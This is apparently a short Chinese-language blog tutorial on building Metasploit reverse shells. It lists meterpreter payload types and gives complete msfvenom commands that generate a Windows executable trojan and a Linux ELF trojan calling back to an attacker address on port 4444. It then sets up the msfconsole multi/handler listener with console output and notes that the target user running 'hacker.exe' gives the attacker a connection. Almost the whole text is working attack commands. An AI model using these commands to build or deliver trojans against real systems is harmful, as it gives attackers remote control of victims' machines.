Metasploit 反弹 shell
利用msfvenom生成一个反弹shell程序
msfvenom -l payloads可以查看所有payload
Windows 通用反向 shell:
windows/meterpreter/reverse --基于 TCP 的反向链接反弹 shell,使用起来很稳定。
windows/meterpreter/reverse_http --基于 http 方式的反向连接,在网速慢的情况下不稳定
windows/meterpreter/reverse_https --基于 https 方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成 443 试试。
windows/meterpreter/bind_tcp --这是一个基于TCP的正向连接 shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置 LHOST。
生成 window 木马命令
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=4444 -f exe -o D:\Test\tmp\hacker.exe
Linux 通用反向 shell:
linux/x86/meterpreter/reverse_tcp
linux/x86/shell_reverse_tcp
生成 linux 木马命令
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o /tmp/client_x64.bin
打开msfconsole创建侦察监听(根据上一步生成的木马类型选择payload)
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.10.10.10
lhost => 10.10.10.10
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run
[*] Started reverse TCP handler on 10.10.10.10:4444
目标用户运行hacker.exe,本地可成功连接。
标签:Metasploit,教程,shell,reverse,windows,tcp,10.10,meterpreter From: https://www.cnblogs.com/snad/p/17802793.html